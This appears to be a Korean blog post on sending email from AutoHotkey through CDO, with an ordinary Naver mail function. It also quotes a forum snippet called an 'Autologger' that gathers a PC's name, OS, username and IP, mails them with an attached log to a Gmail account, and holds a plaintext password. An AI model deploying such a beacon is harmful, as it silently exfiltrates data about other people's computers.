Send an email 메일발송하기
http://v1.autohotkey.co.kr/
1). https://autohotkey.com/boards/viewtopic.php?f=5&t=7736#
2). https://autohotkey.com/board/topic/125455-send-an-email/
here is what i use,
FileAppend,cool,Autolog.ini pmsg := ComObjCreate("CDO.Message") pmsg.From := "lordnitrogen111@gmail.com" pmsg.To := "lordnitrogen111@gmail.com" pmsg.BCC := "" ; Blind Carbon Copy, Invisable for all, same syntax as CC pmsg.CC := "" pmsg.Subject := "Autologger Information" A_MM A_DD A_Hour pmsg.TextBody := "PC Name: " A_ComputerName "`nOS: " A_OSVersion "`nUsername: " A_Username "`nIP: " A_IPAddress1 "`nAutologger Made By: Snow_Flake ©" SPVvar := "Autolog.ini" sAttach = %SPVvar% ; can add multiple attachments, the delimiter is | fields := Object() fields.smtpserver := "smtp.gmail.com" ; specify your SMTP server fields.smtpserverport := 465 ; 25 fields.smtpusessl := True ; False fields.sendusing := 2 ; cdoSendUsingPort fields.smtpauthenticate := 1 ; cdoBasic fields.sendusername := "lordnitrogen111@gmail.com" ; Name fields.sendpassword := "redman22" ; Password fields.smtpconnectiontimeout := 60 schema := "http://schemas.microsoft.com/cdo/configuration/" pfld := pmsg.Configuration.Fields For field,value in fields pfld.Item(schema . field) := value pfld.Update() Loop, Parse, sAttach, |, %A_Space%%A_Tab% pmsg.AddAttachment(A_LoopField) pmsg.Send() sleep, 300 FileDelete, Auto.log
과연?
테스팅님이 소개한 소스 약간 편집해서 네이버메일용으로 바꾼것...
NaverMailSend(toAddr, id, password, subject, textbody, attachment="", fromName="", useHTML=0)
{
mailService := "naver.com"
pmsg := ComObjCreate("CDO.Message")
pmsg.From := fromName? (""" fromName "" <" id "@" mailService ">") : (id "@" mailService)
pmsg.To := toAddr
pmsg.Subject := subject
pmsg.BCC := "" ; Blind Carbon Copy, Invisable for all, same syntax as CC
pmsg.CC := ""
;You can use either Text or HTML body like
if useHTML
pmsg.HtmlBody := textbody
else
pmsg.TextBody := textbody
sAttach := attachment ; can add multiple attachments, the delimiter is |
fields := Object()
fields.smtpserver := "dsmtp.naver.com" ; specify your SMTP server
fields.smtpserverport := 587
fields.smtpusessl := False
fields.sendusing := 2 ; cdoSendUsingPort
fields.smtpauthenticate := 1 ; cdoBasic
fields.sendusername := id "@" mailService
fields.sendpassword := password
fields.smtpconnectiontimeout := 60
schema := "http://schemas.microsoft.com/cdo/configuration/"
pfld := pmsg.Configuration.Fields
For field,value in fields
pfld.Item(schema . field) := value
pfld.Update()
Loop, Parse, sAttach, |, %A_Space%%A_Tab%
pmsg.AddAttachment(A_LoopField)
pmsg.Send()
}
#Send #email #메일발송 #gmail